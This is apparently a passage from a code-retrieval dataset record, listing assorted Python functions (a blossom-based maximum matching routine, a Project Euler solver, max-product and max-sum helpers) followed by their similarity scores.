-min(dualvar[:nvertex]))\r\n else:\r\n vdualoffset = 0\r\n # 0. all dual variables are non-negative\r\n assert min(dualvar[:nvertex]) + vdualoffset >= 0\r\n assert min(dualvar[nvertex:]) >= 0\r\n # 0. all edges have non-negative slack and\r\n # 1. all matched edges have zero slack;\r\n for k in range(nedge):\r\n (i, j, wt) = edges[k]\r\n s = dualvar[i] + dualvar[j] - 2 * wt\r\n iblossoms = [ i ]\r\n jblossoms = [ j ]\r\n while blossomparent[iblossoms[-1]] != -1:\r\n iblossoms.append(blossomparent[iblossoms[-1]])\r\n while blossomparent[jblossoms[-1]] != -1:\r\n jblossoms.append(blossomparent[jblossoms[-1]])\r\n iblossoms.reverse()\r\n jblossoms.reverse()\r\n for (bi, bj) in zip(iblossoms, jblossoms):\r\n if bi != bj:\r\n break\r\n s += 2 * dualvar[bi]\r\n #assert s >= 0\r\n if mate[i] // 2 == k or mate[j] // 2 == k:\r\n assert mate[i] // 2 == k and mate[j] // 2 == k\r\n assert s == 0\r\n # 2. all single vertices have zero dual value;\r\n for v in range(nvertex):\r\n assert mate[v] >= 0 or dualvar[v] + vdualoffset == 0\r\n # 3. 
all blossoms with positive dual value are full.\r\n for b in range(nvertex, 2*nvertex):\r\n if blossombase[b] >= 0 and dualvar[b] > 0:\r\n assert len(blossomendps[b]) % 2 == 1\r\n for p in blossomendps[b][1::2]:\r\n assert mate[endpoint[p]] == p ^ 1\r\n assert mate[endpoint[p ^ 1]] == p\r\n # Ok.\r\n\r\n # Check optimized delta2 against a trivial computation.\r\n def checkDelta2():\r\n for v in range(nvertex):\r\n if label[inblossom[v]] == 0:\r\n bd = None\r\n bk = -1\r\n for p in neighbend[v]:\r\n k = p // 2\r\n w = endpoint[p]\r\n if label[inblossom[w]] == 1:\r\n d = slack(k)\r\n if bk == -1 or d < bd:\r\n bk = k\r\n bd = d\r\n if DEBUG and (bestedge[v] != -1 or bk != -1) and (bestedge[v] == -1 or bd != slack(bestedge[v])):\r\n DEBUG('v=' + str(v) + ' bk=' + str(bk) + ' bd=' + str(bd) + ' bestedge=' + str(bestedge[v]) + ' slack=' + str(slack(bestedge[v])))\r\n assert (bk == -1 and bestedge[v] == -1) or (bestedge[v] != -1 and bd == slack(bestedge[v]))\r\n\r\n # Check optimized delta3 against a trivial computation.\r\n def checkDelta3():\r\n bk = -1\r\n bd = None\r\n tbk = -1\r\n tbd = None\r\n for b in range(2 * nvertex):\r\n if blossomparent[b] == -1 and label[b] == 1:\r\n for v in blossomLeaves(b):\r\n for p in neighbend[v]:\r\n k = p // 2\r\n w = endpoint[p]\r\n if inblossom[w] != b and label[inblossom[w]] == 1:\r\n d = slack(k)\r\n if bk == -1 or d < bd:\r\n bk = k\r\n bd = d\r\n if bestedge[b] != -1:\r\n (i, j, wt) = edges[bestedge[b]]\r\n assert inblossom[i] == b or inblossom[j] == b\r\n assert inblossom[i] != b or inblossom[j] != b\r\n assert label[inblossom[i]] == 1 and label[inblossom[j]] == 1\r\n if tbk == -1 or slack(bestedge[b]) < tbd:\r\n tbk = bestedge[b]\r\n tbd = slack(bestedge[b])\r\n if DEBUG and bd != tbd:\r\n DEBUG('bk=%d tbk=%d bd=%s tbd=%s' % (bk, tbk, repr(bd), repr(tbd)))\r\n assert bd == tbd\r\n\r\n # Main loop: continue until no further improvement is possible.\r\n for t in range(nvertex):\r\n\r\n # Each iteration of this loop is a \"stage\".\r\n # A stage finds an augmenting path and uses that to improve\r\n # the matching.\r\n if DEBUG: DEBUG('STAGE %d' % t)\r\n\r\n # Remove labels from top-level blossoms/vertices.\r\n label[:] = (2 * nvertex) * [ 0 ]\r\n\r\n # Forget all about least-slack edges.\r\n bestedge[:] = (2 * nvertex) * [ -1 ]\r\n blossombestedges[nvertex:] = nvertex * [ None ]\r\n\r\n # Loss of labeling means that we can not be sure that currently\r\n # allowable edges remain allowable througout this stage.\r\n allowedge[:] = nedge * [ False ]\r\n\r\n # Make queue empty.\r\n queue[:] = [ ]\r\n \r\n # Label single blossoms/vertices with S and put them in the queue.\r\n for v in range(nvertex):\r\n if mate[v] == -1 and label[inblossom[v]] == 0:\r\n assignLabel(v, 1, -1)\r\n\r\n # Loop until we succeed in augmenting the matching.\r\n augmented = 0\r\n while 1:\r\n\r\n # Each iteration of this loop is a \"substage\".\r\n # A substage tries to find an augmenting path;\r\n # if found, the path is used to improve the matching and\r\n # the stage ends. 
If there is no augmenting path, the\r\n # primal-dual method is used to pump some slack out of\r\n # the dual variables.\r\n if DEBUG: DEBUG('SUBSTAGE')\r\n\r\n # Continue labeling until all vertices which are reachable\r\n # through an alternating path have got a label.\r\n while queue and not augmented:\r\n\r\n # Take an S vertex from the queue.\r\n v = queue.pop()\r\n if DEBUG: DEBUG('POP v=%d' % v)\r\n assert label[inblossom[v]] == 1\r\n\r\n # Scan its neighbours:\r\n for p in neighbend[v]:\r\n k = p // 2\r\n w = endpoint[p]\r\n # w is a neighbour to v\r\n if inblossom[v] == inblossom[w]:\r\n # this edge is internal to a blossom; ignore it\r\n continue\r\n if not allowedge[k]:\r\n kslack = slack(k)\r\n if kslack <= 0:\r\n # edge k has zero slack => it is allowable\r\n allowedge[k] = True\r\n if allowedge[k]:\r\n if label[inblossom[w]] == 0:\r\n # (C1) w is a free vertex;\r\n # label w with T and label its mate with S (R12).\r\n assignLabel(w, 2, p ^ 1)\r\n elif label[inblossom[w]] == 1:\r\n # (C2) w is an S-vertex (not in the same blossom);\r\n # follow back-links to discover either an\r\n # augmenting path or a new blossom.\r\n base = scanBlossom(v, w)\r\n if base >= 0:\r\n # Found a new blossom; add it to the blossom\r\n # bookkeeping and turn it into an S-blossom.\r\n addBlossom(base, k)\r\n else:\r\n # Found an augmenting path; augment the\r\n # matching and end this stage.\r\n augmentMatching(k)\r\n augmented = 1\r\n break\r\n elif label[w] == 0:\r\n # w is inside a T-blossom, but w itself has not\r\n # yet been reached from outside the blossom;\r\n # mark it as reached (we need this to relabel\r\n # during T-blossom expansion).\r\n assert label[inblossom[w]] == 2\r\n label[w] = 2\r\n labelend[w] = p ^ 1\r\n elif label[inblossom[w]] == 1:\r\n # keep track of the least-slack non-allowable edge to\r\n # a different S-blossom.\r\n b = inblossom[v]\r\n if bestedge[b] == -1 or kslack < slack(bestedge[b]):\r\n bestedge[b] = k\r\n elif label[w] == 0:\r\n # w is a free vertex (or an unreached vertex inside\r\n # a T-blossom) but we can not reach it yet;\r\n # keep track of the least-slack edge that reaches w.\r\n if bestedge[w] == -1 or kslack < slack(bestedge[w]):\r\n bestedge[w] = k\r\n\r\n if augmented:\r\n break\r\n\r\n # There is no augmenting path under these constraints;\r\n # compute delta and reduce slack in the optimization problem.\r\n # (Note that our vertex dual variables, edge slacks and delta's\r\n # are pre-multiplied by two.)\r\n deltatype = -1\r\n delta = deltaedge = deltablossom = None\r\n\r\n # Verify data structures for delta2/delta3 computation.\r\n if CHECK_DELTA:\r\n checkDelta2()\r\n checkDelta3()\r\n\r\n # Compute delta1: the minumum value of any vertex dual.\r\n if not maxcardinality:\r\n deltatype = 1\r\n delta = min(dualvar[:nvertex])\r\n\r\n # Compute delta2: the minimum slack on any edge between\r\n # an S-vertex and a free vertex.\r\n for v in range(nvertex):\r\n if label[inblossom[v]] == 0 and bestedge[v] != -1:\r\n d = slack(bestedge[v])\r\n if deltatype == -1 or d < delta:\r\n delta = d\r\n deltatype = 2\r\n deltaedge = bestedge[v]\r\n\r\n # Compute delta3: half the minimum slack on any edge between\r\n # a pair of S-blossoms.\r\n for b in range(2 * nvertex):\r\n if ( blossomparent[b] == -1 and label[b] == 1 and\r\n bestedge[b] != -1 ):\r\n kslack = slack(bestedge[b])\r\n if isinstance(kslack, integer_types):\r\n assert (kslack % 2) == 0\r\n d = kslack // 2\r\n else:\r\n d = kslack / 2\r\n if deltatype == -1 or d < delta:\r\n delta = d\r\n deltatype = 
3\r\n deltaedge = bestedge[b]\r\n\r\n # Compute delta4: minimum z variable of any T-blossom.\r\n for b in range(nvertex, 2*nvertex):\r\n if ( blossombase[b] >= 0 and blossomparent[b] == -1 and\r\n label[b] == 2 and\r\n (deltatype == -1 or dualvar[b] < delta) ):\r\n delta = dualvar[b]\r\n deltatype = 4\r\n deltablossom = b\r\n\r\n if deltatype == -1:\r\n # No further improvement possible; max-cardinality optimum\r\n # reached. Do a final delta update to make the optimum\r\n # verifyable.\r\n assert maxcardinality\r\n deltatype = 1\r\n delta = max(0, min(dualvar[:nvertex]))\r\n\r\n # Update dual variables according to delta.\r\n for v in range(nvertex):\r\n if label[inblossom[v]] == 1:\r\n # S-vertex: 2*u = 2*u - 2*delta\r\n dualvar[v] -= delta\r\n elif label[inblossom[v]] == 2:\r\n # T-vertex: 2*u = 2*u + 2*delta\r\n dualvar[v] += delta\r\n for b in range(nvertex, 2*nvertex):\r\n if blossombase[b] >= 0 and blossomparent[b] == -1:\r\n if label[b] == 1:\r\n # top-level S-blossom: z = z + 2*delta\r\n dualvar[b] += delta\r\n elif label[b] == 2:\r\n # top-level T-blossom: z = z - 2*delta\r\n dualvar[b] -= delta\r\n\r\n # Take action at the point where minimum delta occurred.\r\n if DEBUG: DEBUG('delta%d=%f' % (deltatype, delta))\r\n if deltatype == 1: \r\n # No further improvement possible; optimum reached.\r\n break\r\n elif deltatype == 2:\r\n # Use the least-slack edge to continue the search.\r\n allowedge[deltaedge] = True\r\n (i, j, wt) = edges[deltaedge]\r\n if label[inblossom[i]] == 0:\r\n i, j = j, i\r\n assert label[inblossom[i]] == 1\r\n queue.append(i)\r\n elif deltatype == 3:\r\n # Use the least-slack edge to continue the search.\r\n allowedge[deltaedge] = True\r\n (i, j, wt) = edges[deltaedge]\r\n assert label[inblossom[i]] == 1\r\n queue.append(i)\r\n elif deltatype == 4:\r\n # Expand the least-z blossom.\r\n expandBlossom(deltablossom, False)\r\n\r\n # End of a this substage.\r\n\r\n # Stop when no more augmenting path can be found.\r\n if not augmented:\r\n break\r\n\r\n # End of a stage; expand all S-blossoms which have dualvar = 0.\r\n for b in range(nvertex, 2*nvertex):\r\n if ( blossomparent[b] == -1 and blossombase[b] >= 0 and\r\n label[b] == 1 and dualvar[b] == 0 ):\r\n expandBlossom(b, True)\r\n\r\n # Verify that we reached the optimum solution.\r\n if CHECK_OPTIMUM:\r\n verifyOptimum()\r\n\r\n # Transform mate[] such that mate[v] is the vertex to which v is paired.\r\n for v in range(nvertex):\r\n if mate[v] >= 0:\r\n mate[v] = endpoint[mate[v]]\r\n for v in range(nvertex):\r\n assert mate[v] == -1 or mate[mate[v]] == v\r\n\r\n return mate", "def solveProblem027():\n primes = getPrimeRange(0, 5000000)\n biggestConseqPrimes = 0\n coefficients = (0, 0)\n # b has to be a prime number or else n = 0 doesn't come out prime\n bRange = getPrimeRange(0, 1000)\n for a in range(-999, 1000, 1):\n print(a)\n for b in bRange:\n n = 0\n numConseqPrimes = 0\n while True:\n if ((n**2) + (a * n) + b) in primes:\n numConseqPrimes += 1\n n += 1\n else:\n break\n if n > biggestConseqPrimes:\n biggestConseqPrimes = n\n coefficients = (a, b)\n print(\"The coefficients that produce the largest number of consecutive\" \\\n \"primes are a = %d b = %d\" % (coefficients))\n print(\"The product of the coefficients is %d\" % (coefficients[a] * \\\n coefficients[b])\n\nif __name__ == \"__main__\":\n solveProblem027()", "def get_most_combined_products(self):\n self.product_pairs = self.products.groupby(\"id\").agg({\"products\": lambda x: list(x)}).reset_index()\n self.product_pairs['product_pairs'] = 
self.product_pairs['products'].apply(\n lambda x: np.array(list(product(x, x))).tolist())\n self.product_pairs = pd.DataFrame(np.concatenate(list(self.product_pairs['product_pairs'])).tolist())\n self.product_pairs['total_pairs'] = 1\n self.product_pairs = self.product_pairs[self.product_pairs[0] != self.product_pairs[1]]\n self.product_pairs = self.product_pairs.groupby([0, 1]).agg({\"total_pairs\": \"sum\"}).reset_index()\n self.product_pairs = self.product_pairs.sort_values('total_pairs', ascending=False)\n self.product_pairs = self.product_pairs.rename(columns={0: \"pair_1\", 1: \"pair_2\"})\n self.product_pairs['product_pair'] = self.product_pairs.apply(\n lambda row: \" - \".join(list(sorted([row['pair_1'], row['pair_2']]))), axis=1)\n self.product_pairs = self.product_pairs.groupby(\"product_pair\").agg({\"total_pairs\": \"first\"}).reset_index()\n return self.product_pairs", "def largest_product(digits, size):\n # Why does a blank set of digits have a maximum product of 1?\n slice_list = slices(digits, size)\n def mult_reduce(items):\n total = 1\n for i in items:\n total *= i\n return total\n slice_list = [mult_reduce(l) for l in slice_list]\n return max(slice_list)", "def max_power_in_candidate_storage_rule(_m, g, y, s, t):\r\n\r\n return m.p_in[g, y, s, t] - sum(m.x_c[g, j] for j in m.Y if j <= y) <= 0", "def v10_multimax(iterable, key=lambda x: x):\n max_key = None\n maximums = []\n for item in iterable:\n k = key(item)\n if k == max_key:\n maximums.append(item)\n elif not maximums or k > max_key:\n maximums = [item]\n max_key = k\n return maximums", "def get_cross_prod(self):\n ret = 1\n for dec in self.decisions:\n ret *= self.get_num_alt(dec)\n return ret", "def get_sub_combinations(maxop):\n combo = collections.defaultdict(list)\n for numops in range(maxop+1):\n if numops:\n combo[numops, 1].append((numops-1,))\n for op1 in range(numops):\n combo[numops, 2].append((op1, numops - op1 - 1))\n for op2 in range(numops - op1):\n combo[numops, 3].append((op1, op2, numops - op1 - op2 - 1))\n return combo", "def maxSumOfThreeSubarrays(self, nums, k):\n\n if not nums or k <= 0:\n raise Exception(\"Invalid Exception!\")\n\n n = len(nums)\n if k*3 > n:\n return []\n\n dp1 = [(0, None)] * n\n dp2 = [(0, None)] * n\n\n # base case\n dp1[k-1] = (sum(nums[:k]), 0)\n dp2[n-k] = (sum(nums[n-k:n]), n-k)\n\n # transition\n for i in range(k, n):\n pmax_sum, _ = dp1[i-1]\n max_sum = sum(nums[i-k+1:i+1])\n if max_sum > pmax_sum:\n dp1[i] = (max_sum, i-k+1)\n else:\n dp1[i] = dp1[i-1]\n\n for i in range(n-k-1, -1, -1):\n smax_sum, _ = dp2[i+1]\n max_sum = sum(nums[i:i+k])\n if max_sum >= smax_sum:\n dp2[i] = (max_sum, i)\n else:\n dp2[i] = dp2[i+1]\n\n max_sum = 0\n for i in range(k, n-k):\n curr_max_sum = dp1[i-1][0] + dp2[i+k][0] + sum(nums[i:i+k])\n if curr_max_sum > max_sum:\n ans = [dp1[i-1][1], i, dp2[i+k][1]]\n max_sum = curr_max_sum\n return ans", "def max_profit(prices: List[int]) -> int:", "def m(self):\n\t\tn = 0\n\t\ti = self.k0\n\t\twhile 1:\n\t\t\tif i > self.j:\n\t\t\t\treturn n\n\t\t\tif not self.cons(i):\n\t\t\t\tbreak\n\t\t\ti = i + 1\n\t\ti = i + 1\n\t\twhile 1:\n\t\t\twhile 1:\n\t\t\t\tif i > self.j:\n\t\t\t\t\treturn n\n\t\t\t\tif self.cons(i):\n\t\t\t\t\tbreak\n\t\t\t\ti = i + 1\n\t\t\ti = i + 1\n\t\t\tn = n + 1\n\t\t\twhile 1:\n\t\t\t\tif i > self.j:\n\t\t\t\t\treturn n\n\t\t\t\tif not self.cons(i):\n\t\t\t\t\tbreak\n\t\t\t\ti = i + 1\n\t\t\ti = i + 1", "def recommend_next_product(self, prod_list):\n scores = defaultdict(float)\n for prod in prod_list:\n for item in 
self._purchased.find({PROD1: prod}):\n if not item[PROD2] in prod_list:\n scores[item[PROD2]] += math.log(item[TIMES])\n if len(scores) == 0:\n return None\n max_tuple = max(scores.items(), key = operator.itemgetter(1))\n return max_tuple[0]", "def max_ij(f, K):\n i_best, j_best, m_value_min = min_ij(lambda i, j: (-1) * f(i, j), K)\n return i_best, j_best, - m_value_min", "def brute_force_algorithm(clauses, literals):\n n = 2**literals\n num_of_clauses = len(clauses)\n\n max = 0\n res_val_list = []\n\n for i in range(n):\n valuation_list, curr_max = solution(i, literals, clauses)\n\n if curr_max > max:\n max = curr_max\n res_val_list = valuation_list\n\n if max == num_of_clauses:\n break\n\n return (max, res_val_list)", "def max_power_candidate_thermal_rule(_m, g, y, s, t):\r\n\r\n return m.p[g, y, s, t] - sum(m.x_c[g, j] for j in m.Y if j <= y) <= 0", "def most_parallel_vector(v, vectors, tolerance_dot=0.0):\n\n best_dot = tolerance_dot\n best_w = None\n for w in vectors:\n d = abs_dot(v, w)\n if d > best_dot:\n best_dot = d\n best_w = w\n return best_w" ]
[ "0.76415133", "0.7435716", "0.7419571", "0.73527825", "0.6995507", "0.6947662", "0.6701412", "0.66534376", "0.66308546", "0.6610363", "0.65937907", "0.65213996", "0.65124816", "0.6395902", "0.63665193", "0.63143504", "0.62744373", "0.62582433", "0.62466544", "0.6241433", "0.6220394", "0.61534584", "0.6126939", "0.6095926", "0.608856", "0.6063815", "0.60294616", "0.6018269", "0.6014992", "0.6013762", "0.60130626", "0.60000646", "0.5979464", "0.5951742", "0.5951518", "0.5951455", "0.5950986", "0.590952", "0.5887022", "0.58768433", "0.5868189", "0.5863492", "0.58372486", "0.58310497", "0.58245116", "0.58113253", "0.580621", "0.5797005", "0.5783159", "0.5777067", "0.57670045", "0.5754826", "0.5754648", "0.5747182", "0.5744478", "0.57415664", "0.57378715", "0.57324886", "0.57108665", "0.57053155", "0.5699443", "0.56951106", "0.56904656", "0.5688949", "0.5671796", "0.5658226", "0.56512576", "0.56400144", "0.563292", "0.5605755", "0.5595705", "0.5594418", "0.5592832", "0.55820906", "0.55815816", "0.55786806", "0.5575631", "0.5568063", "0.5567838", "0.5565691", "0.5556445", "0.5548779", "0.553822", "0.55370665", "0.5527635", "0.55167675", "0.5507951", "0.5495496", "0.5490604", "0.5479136", "0.5474535", "0.5468124", "0.5464875", "0.54635113", "0.5460514", "0.54592055", "0.5456166", "0.5453376", "0.5451865", "0.5448363" ]
0.7392273
3
Sort the list first, then take the last two numbers (the biggest) and multiply them
def max_pairwise_product_sort(numbers):
    sorted_list = sorted(numbers)
    ans = sorted_list[-1]*sorted_list[-2]
    return ans
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def greatest_difference(num_list):", "def highest_product_2(arr):\n\n # make a list to store the highest three ints, initializing to first three\n maxes = [arr[0], arr[1], arr[2]]\n\n # find the lowest of the highest three ints\n lowest_max = min(maxes)\n\n # go through the rest of the list to check for higher values\n for num in arr[3:]:\n # if any value is higher than the lowest max, update maxes list\n if num > lowest_max:\n # remove the old maximum\n maxes.remove(lowest_max)\n # add the new one\n maxes.append(num)\n # recalculate the lowest max for continued comparison\n lowest_max = min(maxes)\n\n return maxes[0] * maxes[1] * maxes[2]", "def max_pairwise_product_sort(array):\n if len(array) <= 1:\n return 0\n\n array.sort()\n\n return array[-1] * array[-2]", "def nth_largest2(a_list, n):\n a_list.sort()\n new_list = a_list[::-1]\n return new_list[n-1]", "def max_in_list(list):\n x=list[0] #set x be the first number in the list\n for i in range(0,len(list)):#go over the number in the list\n if x<=list[i]: #if the second one is bigger than the first\n x=list[i] #assign x to the bigger one\n else:\n continue#repeat until find the max number\n return x", "def max_pairwise_product_fast(numbers):\n num_list = numbers.copy()\n max_num_1 = max(num_list)\n num_list.remove(max_num_1)\n max_num_2 = max(num_list)\n ans = max_num_1*max_num_2\n return ans", "def question_22(list_num: float) -> float:\n list_num.sort()\n return list_num[0:3]", "def second_largest(number_list):\n for i in range(len(number_list)):\n for j in range(len(number_list) - 1 - i):\n if number_list[j] > number_list[j+1]:\n number_list[j + 1], number_list[j] = number_list[j], number_list[j+1]\n\n return number_list[-2]", "def largest(n,xs):\n return sorted(xs, reverse = True)[:n][::-1]", "def find_greatest_number(incoming_list: list):\n return max(incoming_list)", "def find_greatest_number(incoming_list):\n retval = max(incoming_list)\n return retval", "def my_max(in_list):\n biggest = in_list[0]\n for l in in_list:\n if l > biggest:\n biggest = l\n return biggest", "def maximumProduct2(self, nums: List[int]) -> int:\n big_1 = big_2 = big_3 = -float(\"inf\")\n small_1 = small_2 = float(\"inf\")\n for n in nums:\n if n >= big_1:\n big_1, big_2, big_3 = n, big_1, big_2\n elif n >= big_2:\n big_2, big_3 = n, big_2\n elif n >= big_3:\n big_3 = n\n \n if n <= small_1:\n small_1, small_2 = n, small_1\n elif n <= small_2:\n small_2 = n\n \n return max(big_1 * big_2 * big_3, big_1 * small_1 * small_2)", "def question_21(list_num: float) -> float:\n list_num.sort(reverse=True)\n return list_num[0:3]", "def highest_product(arr):\n\n product = 1\n\n for i in range(3):\n # find the max value in the list, get the index, pop it, and mulitply\n product *= arr.pop(arr.index(max(arr)))\n\n return product", "def calc_max(data: list) -> float:\n acc = data[0]\n for n in data:\n if n > acc:\n acc = n\n return float(acc)", "def find_greatest_number(incoming_list):\n #magiclownumber= none\n #retval= magiclownumber\n #for value in incoming_list:\n #if not retval:\n #retval = value\n # if value> retvale\n #retval= value\n #return retval\n greatest_number = max(incoming_list)\n return greatest_number", "def max_(lst: Iterable[int]) -> int:\n return reduce(lambda x, y: x if x > y else y, lst)", "def largest_item(list):\n pass", "def find_greatest_number(incoming_list):\n #return_value = max(incoming_list)\n #return return_value\n\n MAGIC_LOW_NUMBER = None\n retval = MAGIC_LOW_NUMBER\n\n # 1,2,3,4,5,1\n # MAGIC_LOW_NUMBER, 1 ->STORE 1\n #1 , 2 
->STORE 2\n #2, , 3 ->STORE 3\n #3, , 4 ->STORE 4 \n #4, , 5 ->STORE 5\n #5, , 1 ->??? nothing \n for value in incoming_list:\n if not retval:\n retval = value\n if value > retval:\n retval = value", "def largest_ten(list1):\n result = []\n for i in range(10):\n max1 = list1[0]\n for j in list1:\n if max1 < j:\n max1 = j\n result.append(max1) ##the final target is the max1 when finishing this loop\n list1.remove(max1)\n\n return result", "def main(num, li1, list2):\n li1 = [[float(input()), float(input())] for i in range(num)]\n list2 = [li1[i][1]/li1[i][0] for i in range(num)]\n li1.sort(key=lambda x: x[0])\n for i in range(num):\n if li1[i][1]/li1[i][0] == max(list2):\n return print(\"%.2f %.2f\"%(li1[i][0], li1[i][1]))", "def get_max_loot(input_list):\n even = sum(input_list[::2])\n odd = sum(input_list[1::2])\n return even if even > odd else odd", "def findSecondLargest(self):\n l = []\n self.flatten(l)\n print(l)\n print(l[-2])", "def max_pairwise_product_linear(array):\n\n if len(array) <= 1:\n return 0\n\n two_biggest_values = [0, 0]\n\n for element in array:\n if element > two_biggest_values[0]:\n two_biggest_values[0] = element\n elif element > two_biggest_values[1]:\n two_biggest_values[1] = element\n\n return two_biggest_values[0] * two_biggest_values[1]", "def find_largest_number_in_list(self, list_with_numbers):\n return 0", "def get_sum_of_greatest_elements(my_list, x):\r\n result = []\r\n for i in range(0, x):\r\n max1 = 0\r\n for j in range(len(my_list)):\r\n if my_list[j] > max1:\r\n max1 = my_list[j]\r\n my_list.remove(max1)\r\n result.append(max1)\r\n\r\n count = 0\r\n for x in result:\r\n count += x\r\n return count", "def max_num(num_list):\n\n return max(num_list)", "def radix_sort(mylist):\n max_num = max(mylist)\n position = 1 # Find decimal position\n while len(str(max_num)) <= len(str(position)): # Go for as many decimal places in largest num\n int(position)\n counting_sort(mylist, position) # Sort by decimal place\n position *= 10 # Increase to next left decimal place", "def two_largest(inlist):\n largest = second_largest = 0\n it1 = it2 = 0\n\n for i,item in enumerate(inlist):\n if item > largest:\n largest = item\n it1 = i\n elif largest > item > second_largest:\n second_largest = item\n it2 = i\n # Return the results as a tuple\n return largest, it1, second_largest, it2", "def pizza_sort(lst):\n length = len(lst)\n def based_god_help_me(lst,index=0):\n if index == length - 1:\n return\n greatest = index_largest(lst[index:]) + index\n lst[greatest], lst[index] = lst[index], lst[greatest]\n based_god_help_me(lst,index+1)\n return based_god_help_me(lst)", "def most_popular_binary(lst_sorted):\n for l in range(1, 11):\n print(l, lst_sorted[-l])", "def maximumProduct1(self, nums: List[int]) -> int:\n s_nums = sorted(nums, reverse=True)\n return max(s_nums[0] * s_nums[1] * s_nums[2], s_nums[0] * s_nums[-1] * s_nums[-2])", "def max_val(t):\n # Your code here\n\n def openItem(term):\n newList = []\n\n for item in term:\n if type(item) == int:\n newList.append(item)\n\n else:\n newList += openItem(item)\n\n return newList\n\n sortingList = openItem(t)\n\n maximum = sortingList[0]\n\n for item in sortingList:\n if maximum < item:\n maximum = item\n\n return maximum", "def sum_abs_biggest_3_value(list_data):\n data = copy.deepcopy(list_data)\n data.sort()\n\n return sum_abs_list(data[-3:])", "def largest_number_at_least_twice_of_others2(nums: [int]) -> int:\n if len(nums) == 1:\n return 0\n\n max_index = nums.index(max(nums))\n max_val = nums.pop(max_index)\n next_max = 
max(nums)\n\n if next_max * 2 <= max_val:\n return max_index\n return -1", "def sortedSquares(nums: List[int]) -> List[int]:\n return sorted([n*n for n in nums])", "def greedy(items_list, max_cost, key_function):\n tmp_list = sorted(items_list, key=key_function, reverse=True)\n cur_cost = 0\n cur_value = 0\n result = []\n\n for item in tmp_list:\n if cur_cost + item.getCost() <= max_cost:\n result.append(item)\n cur_cost += item.getCost()\n cur_value += item.getValue()\n return result, cur_value", "def rearrange_digits(input_list):\n if len(input_list) == 0:\n raise ValueError(\"input list is empty!\")\n\n heapsort(input_list)\n \n num_1, num_2 = 0, 0\n \n multiplier = 1\n idx = 0\n while idx < len(input_list)-1:\n num_1 += input_list[idx]*multiplier\n num_2 += input_list[idx+1]*multiplier\n multiplier *= 10\n idx += 2\n \n if idx < len(input_list):\n num_1 += input_list[idx]*multiplier\n \n return [num_1, num_2]", "def multiplication_total_of(num_list):", "def max(input: list[int]) -> int:\n if len(input) == 0:\n raise ValueError(\"max() arg is an empty List\")\n else:\n input.sort()\n return input[-1]", "def maximumToys(moneyAvailable, priceList):\n priceList.sort()\n count = 0\n for toyPrice in priceList:\n if toyPrice <= moneyAvailable:\n count += 1\n moneyAvailable -= toyPrice\n else:\n return count", "def burbuja(lista:list):\n vector = lista\n for i in range(0, len(vector)-1):\n for j in range(0, len(vector)-1):\n if vector[j] > vector[j+1]:\n tmp = vector[j+1]\n vector[j+1] = vector[j]\n vector[j] = tmp\n return vector", "def largest_two():\n # Add your code below!", "def question_24(list_num: int) -> int:\n return max(list_num, key=list_num.count)", "def max_profit(prices: List[int]) -> int:", "def find_max(ls):\n\n if len(ls) == 1:\n return ls[0]\n elif len(ls) == 2:\n return ls[0] if ls[0] > ls[1] else ls[1]\n else:\n mid = len(ls) // 2\n m1 = find_max(ls[0:mid])\n m2 = find_max(ls[mid:])\n return m1 if m1 > m2 else m2", "def find_largest_element(num_1, num_2, num_3):\n\n return max([num_1, num_2, num_3])", "def maxVal(item_list, rem_space):\n if item_list == [] or rem_space == 0: # no items or space\n result = (0, ())\n else:\n next_item = item_list[0]\n if next_item.getCost() > rem_space:\n result = maxVal(item_list[1:], rem_space)\n else:\n with_val, with_list = maxVal(item_list[1:],\n rem_space-next_item.getCost())\n with_val += next_item.getValue()\n\n without_val, without_list = maxVal(item_list[1:],\n rem_space)\n if with_val > without_val:\n result = (with_val, with_list + (next_item, ))\n else:\n result = (without_val, without_list)\n return result", "def max_num_in_list(a_list):\n max_number = max(a_list)\n return max_number", "def rearrange_digits(input_list):\n ## Corner cases:\n if len(input_list) == 0:\n return [0, 0]\n elif len(input_list) == 1:\n return [input_list[0], 0]\n\n # Sort an array using merge-sort\n sorted_list = merge_sort(input_list)\n\n # Create two empty array and pop largest number from an sorted_list \n # and push into each empty array one by one\n # This also ensures that the number of digits in both the numbers cannot differ by more than 1\n first_num_list = list()\n second_num_list = list()\n \n while sorted_list:\n first_num_list.append(sorted_list.pop())\n # Break the while loop if array is empty\n if not sorted_list:\n break\n second_num_list.append(sorted_list.pop())\n\n first_num = int(\"\".join(str(i) for i in first_num_list))\n second_num = int(\"\".join(str(i) for i in second_num_list))\n \n # Create an output array of two nums\n 
out_list = []\n out_list.append(first_num)\n out_list.append(second_num)\n return out_list", "def test_returns_largest_product_within_array(self):\n result = max_product([2,3,-2,4,10,-5,3,2,1])\n self.assertEqual(result, 14400)", "def give_greatest_spart(cls, spart_list):\n if len(spart_list) == 1:\n return spart_list[0]\n sorted_list = cls.sort_by_dominance(spart_list)\n if not(sorted_list[0] > sorted_list[1]):\n print(\"The two largest elements are non-comparable\")\n return []\n else:\n return sorted_list[0]", "def list_max(numbers):\n maxnum = 0\n \n for num in numbers[0:]:\n if num > maxnum:\n maxnum = num\n return maxnum", "def maxProduct2(nums):\n\n maxSubseq = nums[0]\n minSubseq = nums[0]\n res = nums[0]\n for i in range(1, len(nums)):\n if nums[i] < 0:\n minSubseq, maxSubseq = maxSubseq, minSubseq\n maxSubseq = max(nums[i], maxSubseq*nums[i])\n minSubseq = min(nums[i], minSubseq*nums[i])\n res = max(res, maxSubseq)\n return res", "def maximum(some_list):\n return max(some_list)", "def findMaxProduct(n):\n large = 0\n for i in range(len(s)):\n p = 1\n number = s[i:i+n]\n for iteration in range(len(number)):\n h = number[iteration]\n p = p * int(h)\n if p > large:\n large = p\n\n \n return large", "def most_popular(lst):\n lst2 = copy.copy(lst)\n most_pop = []\n\n for j in range(10):\n biggest = 0\n biggest_name = \"\"\n index = 0\n for i in range(len(lst2)):\n if lst2[i][1] > biggest:\n biggest = lst2[i][1]\n biggest_name = lst2[i][0]\n index = i\n most_pop.append((j+1, biggest, biggest_name))\n del lst2[index]\n return most_pop", "def get_majority_element_linear(self, lst):\r\n # Idea: Boyer–Moore majority vote algorithm (O(n) time)\r\n lst, n = sorted(lst), len(lst)\r\n \r\n if n <= 2:\r\n if lst[0] == lst[1]: return 1\r\n else: return -1\r\n \r\n temp_lst, count = [], 1\r\n for i in range(n-1):\r\n if lst[i] == lst[i+1]:\r\n temp_lst.append(lst[i])\r\n count += 1\r\n else: \r\n if count > int(math.floor(n / 2.0)): return count\r\n else: count = 1\r\n i += 1\r\n \r\n return -1", "def 